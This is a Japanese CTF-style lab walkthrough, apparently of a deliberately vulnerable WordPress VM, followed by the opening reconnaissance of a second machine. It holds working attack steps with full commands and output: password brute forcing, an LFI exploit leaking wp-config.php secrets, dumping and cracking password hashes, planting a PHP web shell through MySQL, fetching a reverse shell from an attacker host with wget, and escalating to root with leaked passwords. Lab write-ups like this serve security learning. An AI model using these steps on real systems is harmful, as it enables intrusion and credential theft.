 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css, Match: 'Version: 0.9'

[+] sydney
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/
 | Last Updated: 2020-03-13T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/readme.txt
 | [!] The version is out of date, the latest version is 1.60
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css
 | Style Name: Sydney
 | Style URI: http://athemes.com/theme/sydney
 | Description: Sydney is a powerful business theme that provides a fast way for companies or freelancers to create ...
 | Author: aThemes
 | Author URI: http://athemes.com
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/, status: 500
 |
 | Version: 1.28 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css, Match: 'Version: 1.28'

[+] trope
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/
 | Last Updated: 2018-06-12T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css
 | Style Name: Trope
 | Style URI: http://wpdean.com/trope-wordpress-theme/
 | Description: Trope is a free WordPress theme that comes with clean, modern, minimal and fully responsive design w...
 | Author: WPDean
 | Author URI: http://wpdean.com/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/trope/, status: 500
 |
 | Version: 1.1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css, Match: 'Version: 1.1.0'

[+] twentyfifteen
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.1'

[+] twentyfourteen
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css
 | Style Name: Twenty Fourteen
 | Style URI: https://wordpress.org/themes/twentyfourteen/
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css, Match: 'Version: 1.4'

[+] twentythirteen
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css
 | Style Name: Twenty Thirteen
 | Style URI: https://wordpress.org/themes/twentythirteen/
 | Description: The 2013 theme for WordPress takes us back to the blog, featuring a full range of post formats, each...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css, Match: 'Version: 1.5'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue May 12 03:35:34 2020
[+] Requests Done: 20974
[+] Cached Requests: 52
[+] Data Sent: 5.399 MB
[+] Data Received: 3.296 MB
[+] Memory used: 276.891 MB
[+] Elapsed time: 00:00:43

とりあえずパスワードクラック狙ってみたけど、

# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -U peter,john,elly,barry,heather,garry,harry,scott,kathy,tim -P /usr/share/wordlists/rockyou.txt
(snip)
[+] Performing password attack on Xmlrpc Multicall against 10 user/s
[SUCCESS] - garry / football                                                                                           
[SUCCESS] - harry / monkey                                                                                             
[SUCCESS] - scott / cookie                                                                                             
[SUCCESS] - kathy / coolgirl                                                                                           
^Cogress Time: 00:28:58 <                                                        > (675 / 172827)  0.39%  ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: garry, Password: football
 | Username: harry, Password: monkey
 | Username: scott, Password: cookie
 | Username: kathy, Password: coolgirl

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue May 12 04:38:01 2020
[+] Requests Done: 727
[+] Cached Requests: 5
[+] Data Sent: 226.524 KB
[+] Data Received: 69.015 MB
[+] Memory used: 1.379 GB
[+] Elapsed time: 00:29:23

Scan Aborted: Canceled by User

長いのでやめた。
分かった中にはadminはいなかったので、テーマ等弄れず。
脆弱性プラグインが見つかれば、先に進めそうな気がするけど見つからんかったしなぁ。
とここで気づき↓
enumerate all plugins is not working · Issue #1222 · wpscanteam/wpscan
え、オプション付けないとplugin検出できないことがあるのか。
早速試行

# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -e ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

(snip)
[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:44 <===================================> (86467 / 86467) 100.00% Time: 00:02:44
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] advanced-video-embed-embed-videos-or-playlists
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-10-14T13:52:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[+] akismet
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/
 | Latest Version: 4.1.5
 | Last Updated: 2020-04-29T13:02:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] shortcode-ui
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/
 | Last Updated: 2019-01-16T22:56:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | [!] The version is out of date, the latest version is 0.7.4
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
 |
 | Version: 0.6.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[+] two-factor
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.5.2
 | Last Updated: 2020-04-30T14:02:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/, status: 200
 |
 | The version could not be determined.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue May 12 03:54:35 2020
[+] Requests Done: 86518
[+] Cached Requests: 13
[+] Data Sent: 23.032 MB
[+] Data Received: 11.735 MB
[+] Memory used: 404.73 MB
[+] Elapsed time: 00:03:10

プラグイン出た。
これらの4つのプラグインを検索すると「two-factor」は無し、「akismet」はバージョンが分からないので無視、「shortcode」はどれもバージョン的に刺さらなそうだった。

# searchsploit advanced video wordpress
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                       |  Path
                                                                                                                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                                                                           | exploits/php/webapps/39646.py
(snip)

LFIでやっていくしかない。
しかしこのexploitの使い方が分からず。
curlでやる。

# curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php
https://10.10.10.14:12380/blogblog/?p=280
# curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php
https://10.10.10.14:12380/blogblog/?p=300

しかしやったところで謎URLが返ってくるのみ。
失敗かと思ったが、「/blogblog/」に戻るとcurlした分だけ謎jpegが投稿されている？
このポストされてる記事がどこにあるのか調べた結果。
「/wp-content/uploads/」にあった。 参考　[Where can I find the directory of all my posts/articles in WordPress? - Stack Overflow] (https://stackoverflow.com/questions/42590267/where-can-i-find-the-directory-of-all-my-posts-articles-in-wordpress)

https://$IP:12380/blogblog/wp-content/uploads/

アクセスするとjpegをダウンロードできるので、curlで一つ落としてみる。

# curl -k -O https://10.10.10.14:12380/blogblog/wp-content/uploads/463030943.jpeg
# file 463030943.jpeg 
463030943.jpeg: PHP script, ASCII text

php？

# cat 463030943.jpeg 
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

さっきのexploitの中身全然読んでなかったけど、LFIってこういうことだったのか。
アクセスしたファイルの中身をjpegファイルとしてテキストファイルに出力するということか。
とりあえず「wp-config.php」のおかげでmysqlにアクセスできそう。
wordpressにadminログインしてページ改ざんを目指す。

# mysql -h 10.10.10.14 -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 945
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.


MySQL > show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (0.001 sec)

MySQL > use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
11 rows in set (0.001 sec)

MySQL [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass                          | user_nicename | user_email            | user_url         | user_registered     | user_activation_key | user_status | display_name    |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
|  1 | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john          | john@red.localhost    | http://localhost | 2016-06-03 23:18:47 |                     |           0 | John Smith      |
|  2 | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly          | Elly@red.localhost    |                  | 2016-06-05 16:11:33 |                     |           0 | Elly Jones      |
|  3 | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter         | peter@red.localhost   |                  | 2016-06-05 16:13:16 |                     |           0 | Peter Parker    |
|  4 | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry         | barry@red.localhost   |                  | 2016-06-05 16:14:26 |                     |           0 | Barry Atkins    |
|  5 | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather       | heather@red.localhost |                  | 2016-06-05 16:18:04 |                     |           0 | Heather Neville |
|  6 | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry         | garry@red.localhost   |                  | 2016-06-05 16:18:23 |                     |           0 | garry           |
|  7 | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry         | harry@red.localhost   |                  | 2016-06-05 16:18:41 |                     |           0 | harry           |
|  8 | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott         | scott@red.localhost   |                  | 2016-06-05 16:18:59 |                     |           0 | scott           |
|  9 | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy         | kathy@red.localhost   |                  | 2016-06-05 16:19:14 |                     |           0 | kathy           |
| 10 | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim           | tim@red.localhost     |                  | 2016-06-05 16:19:29 |                     |           0 | tim             |
| 11 | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe           | zoe@red.localhost     |                  | 2016-06-05 16:19:50 |                     |           0 | ZOE             |
| 12 | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave          | dave@red.localhost    |                  | 2016-06-05 16:20:09 |                     |           0 | Dave            |
| 13 | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon         | simon@red.localhost   |                  | 2016-06-05 16:20:35 |                     |           0 | Simon           |
| 14 | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby          | abby@red.localhost    |                  | 2016-06-05 16:20:53 |                     |           0 | Abby            |
| 15 | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki         | vicki@red.localhost   |                  | 2016-06-05 16:21:14 |                     |           0 | Vicki           |
| 16 | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam           | pam@red.localhost     |                  | 2016-06-05 16:42:23 |                     |           0 | Pam             |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
16 rows in set (0.001 sec)

wordpressのパスワードをリークできるのでパスワード解析できる形式に出力する。

MySQL [wordpress]> select concat_ws(':', user_login, user_pass) from wp_users into outfile '/var/www/https/blogblog/wp-content/uploads/passwd.txt';
Query OK, 16 rows affected (0.010 sec)

# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt
John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.
Elly:$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
Dave:$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
Simon:$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
Abby:$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0

全員分出力したけどID的にjohnがadminぽいのでjohnのパスワードだけ分かれば良さそう。

# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt | grep John > pass
# john --wordlist=/usr/share/wordlists/rockyou.txt pass
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
incorrect        (John)
1g 0:00:00:12 DONE (2020-05-12 06:04) 0.07961g/s 14721p/s 14721c/s 14721C/s ipod22..iloveafi
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

これでwordpressにadmin権限でログインできたので、いつも通りAppearanc－＞Editorのやつをお好みで書き換える。
今回は「404.php」を書き換える。
「404.php」を丸ごと「/usr/share/webshells/php/php-reverse-shell.php」に書きかえる。

# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
# vim reverse.php 

と思ったけど、今回のwordpressはテーマの書き換えができないらしい。
なぜだ。
mysqlからwebshell仕込む方針に変えていく。
webshellを仕込む。

# mysql -h 10.10.10.14 -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 1013
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/https/blogblog/wp-content/uploads/shell.php';
Query OK, 1 row affected (0.001 sec)

reverse-shellをダウンロードする。

window 1

# python -m SimpleHTTPServer 80

window 2

# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/shell.php?cmd=wget+10.10.10.3/reverse.php

window 1

# nc -nlvp 8080

window 2

curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/reverse.php

window 1

Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux 20:37:56 up 7:59, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" www-data@red:/$

shell getchu!


他のwordpressプラグインチェック方法

curl https://10.10.10.14:12380/blogblog/wp-content/plugins/ -k -s | html2text

## after shell getchu
cronも見た。<br>
kernel exploitも試した。<br>
なかなか刺さらなかった。全然分からなかった。<br>
最後にコレ

www-data@red:/home$ cat /.bash_history cat /.bash_history exit free exit exit exit exit exit exit exit exit id whoami ls -lah pwd ps aux sshpass -p thisimypassword ssh JKanode@localhost apt-get install sshpass sshpass -p JZQuyIN5 peter@localhost ps -ef top kill -9 3747 exit exit exit exit exit whoami exit exit exit exit exit exit exit exit exit id exit top ps aux exit exit exit exit cat: peter/.bash_history: Permission denied top exit

「.bash_history」かぁ～～。<br>
JKanodeにはsudo権限なかったけど、peterにはありました。

ssh peter@10.10.10.14

(snip) red% sudo -l

We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for peter: Matching Defaults entries for peter on red: lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User peter may run the following commands on red: (ALL : ALL) ALL red% sudo su ➜ peter ls ➜ peter id uid=0(root) gid=0(root) groups=0(root) ➜ peter cd /root ➜ ~ ls fix-wordpress.sh flag.txt issue python.sh wordpress.sql ➜ ~ cat flag.txt <(Congratulations)> .-'''''-. |'-----'| |-.....-| | | | | ,. | | __.o o"-. | | .-O o "-.o O )_,._ | | ( o O o )--.-"O o"-.'-----' '--------' ( o O o)
---------- b6b545dc11b7a270f4bad23432190c75162c4a2b

➜ ~ exit

## 終わり
 - 軽くrabbit holeを体験した気がする(まだ甘々か)
 - もしかして今までやってたwordpressのテーマ改ざんってあまりできない？

BTRSys1

サービス調査

# nmap -p- 10.10.10.12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 06:59 EDT
Nmap scan report for 10.10.10.12
Host is up (0.00031s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.49 seconds
# nmap -p21,22,80 -sV --version-all 10.10.10.12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 07:01 EDT
Nmap scan report for 10.10.10.12
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds

気になりどころ

• [port 21] ftp vsftpd 3.0.2
• [port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
• [port 80] http Apache httpd 2.4.7 (Ubuntu)

詳細

[port 21] ftp vsftpd 3.0.2

# searchsploit vsftp
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                       |  Path
                                                                                                                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                                                                                                       | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                                                                                                       | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                                                                                                       | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                                                                                                                                                     | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                                                                                               | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

今後もvsfpdは殆ど刺さらなそう

[port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)

OpenSSH < 6.6 SFTP (x64) - Command Execution                                                                                                                                                         | exploits/linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                                                                                                                               | exploits/linux/remote/45001.py

何か刺さりそうな気がしたけど、SFTP無いし、sshのuserが分からん

[port 80] http Apache httpd 2.4.7 (Ubuntu)

# nikto -h 10.10.10.12
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.12
+ Target Hostname:    10.10.10.12
+ Target Port:        80
+ Start Time:         2020-05-08 07:37:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
